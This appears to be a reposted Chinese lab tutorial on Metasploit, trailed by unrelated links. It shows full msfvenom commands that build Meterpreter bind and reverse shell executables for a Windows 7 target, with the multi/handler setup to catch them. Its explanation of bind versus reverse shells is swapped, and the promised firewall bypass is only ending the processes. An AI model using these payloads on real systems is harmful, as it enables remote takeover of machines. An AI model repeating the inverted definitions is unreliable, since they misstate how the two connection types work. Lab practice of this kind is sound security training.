当前位置: 首页 > news >正文

从MSF载荷生成到Windows防火墙绕过

正向shell与反向shell的本质区别:

bind_tcp是靶机主动连接攻击机的ip与端口,建立shell连接

reverse_tcp则是靶机等待攻击者连接(但第一步是靶机主动发起连接,然后等待)

其中前者易受防火墙的影响

ps:shell就像一个攻击机遥控受害机的遥控器

这里我们的攻击机是kali——192.168.145.128,目标机是win7——192.168.145.160

msf

工具

作用

Msfvenom

生成恶意程序

Exploit模块

利用漏洞执行

Multi/Handler

接收连接

数据库模块

扫描结果

正向连接演示:

kali:msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=5555 -f exe -o b_op.exe

所以:b_op.exe运行后,目标机(win7)的5555端口开启监听

复制到win7去

msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set RHOST 192.168.145.160
set LPORT 5555

run!win7打开恶意文件之后回显成功

反向连接演示

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.145.128 LPORT=9999 -f exe -o r_op.exe

其余类比bindshell

防火墙加固

win7

进入任务管理器把刚才的b_op.exe和r_op.exe结束进程

不再有端口被监听

http://www.dtcms.com/a/542364.html

相关文章:

  • 成品网站设计网站网站设计优缺点
  • 广州建设工程交易中心网站软件定制网站优化 seo一站式
  • orchestrator Web API
  • 营销型网站免费企业网站模版单页网站seo如何优化
  • MySQL之慢查询sql排查及优化
  • 如何实现企业网站推广的系统性哪家公司做跳转网站
  • Redis Cluster集群理论
  • 广州网站开发定制设计北京做网站的大公司
  • 求个网站你会感谢我的西安大雁塔高多少米
  • 59网站一起做网店电商详情页设计思路
  • 网站建设预算表样本wordpress 上一篇 下一篇
  • 江西 网站 建设 开发永辉企业微信app下载安装
  • 提升学历是什么意思百度地图优化
  • 竹子林网站建设php网站开发实践指南
  • 【测试理论和实践 4.测试用例】
  • Java—接口
  • 移动网站源码兰州需要做推广的公司
  • 公司架设网站费用怎么做分录自学it怎么入门
  • 不用代码做网站杭州品牌网站设计
  • 商城建站模板广州从化建设网站官网
  • 免费的游戏网站建设建网站软件工具
  • Spring Boot3零基础教程,SpringSecurity 测试,笔记81
  • 哪里有网站推广优化wordpress获取自定类型
  • wordpress读取mysql北京百度搜索优化
  • IntelliJ IDEA 常用快捷键
  • 枣阳网站建设 枣阳山水数码wordpress文章什么时候收录
  • 代码随想录day20:406.根据身高重建队列
  • Redis之IO多路复用 select,poll,epoll
  • 兰州电商网站建设南宁360网
  • wap网站平台网站备案被拒绝